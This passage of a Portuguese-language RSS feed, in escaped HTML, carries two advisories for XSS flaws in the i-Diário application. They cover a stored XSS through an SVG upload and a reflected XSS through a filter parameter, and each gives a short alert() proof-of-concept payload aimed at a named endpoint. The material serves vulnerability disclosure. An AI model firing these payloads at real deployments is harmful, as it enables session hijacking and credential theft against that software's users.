    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um invasor pode carregadr um arquivo SVG malicioso contendo JavaScript incorporado que é executado quando o arquivo é acessado diretamente. Isso resulta em Cross-Site Scripting Armazenado (XSS).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; permite que os usuários carreguem arquivos após carregarem um SVG criado. O XSS pode ser acionado ao abrir o arquivo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;http://www.w3.org/2000/svg&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;none&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;This is an XSS-POC from CVEHUNTERS&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Crie o arquivo com o payload e carregue-o no endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7870-cross-site-scripting-xss-armazenado-via-upload-de-svg&amp;#34;&amp;gt;CVE-2025-7870: Cross-Site Scripting (XSS) Armazenado via Upload de SVG
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um invasor pode carregadr um arquivo SVG malicioso contendo JavaScript incorporado que é executado quando o arquivo é acessado diretamente. Isso resulta em Cross-Site Scripting Armazenado (XSS).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; permite que os usuários carreguem arquivos após carregarem um SVG criado. O XSS pode ser acionado ao abrir o arquivo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;http://www.w3.org/2000/svg&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;none&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;This is an XSS-POC from CVEHUNTERS&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Crie o arquivo com o payload e carregue-o no endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7870/image.png&amp;#34;
	width=&amp;#34;1015&amp;#34;
	height=&amp;#34;489&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7870/image_hu_97f480d64265cd01.png 480w, /p/cve-2025-7870/image_hu_716aaa27c91d8c32.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;207&amp;#34;
		data-flex-basis=&amp;#34;498px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Depois disso, abra o arquivo para acionar o XSS&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7870/image-1.png&amp;#34;
	width=&amp;#34;1014&amp;#34;
	height=&amp;#34;554&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7870/image-1_hu_f8cd9eca2b7a1c6.png 480w, /p/cve-2025-7870/image-1_hu_8545ee9302fe0aef.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;183&amp;#34;
		data-flex-basis=&amp;#34;439px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7871</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7871/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7871/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7871-cross-site-scripting-xss-refletido-no-endpoint-conteudos-parâmetro-filterby_description&amp;#34;&amp;gt;CVE-2025-7871: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7871-cross-site-scripting-xss-refletido-no-endpoint-conteudos-parâmetro-filterby_description&amp;#34;&amp;gt;CVE-2025-7871: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7871&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;conteudos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;filter[by_description]&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7871/image.png&amp;#34;
	width=&amp;#34;1068&amp;#34;
	height=&amp;#34;456&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7871/image_hu_2d1d25c318923651.png 480w, /p/cve-2025-7871/image_hu_b7c29b14bea54e56.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;562px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7871/image-1.png&amp;#34;
	width=&amp;#34;1782&amp;#34;
	height=&amp;#34;1042&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7871/image-1_hu_4b4784dcf11d21e5.png 480w, /p/cve-2025-7871/image-1_hu_d1ea07eeaf8e7cc2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;171&amp;#34;
		data-flex-basis=&amp;#34;410px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
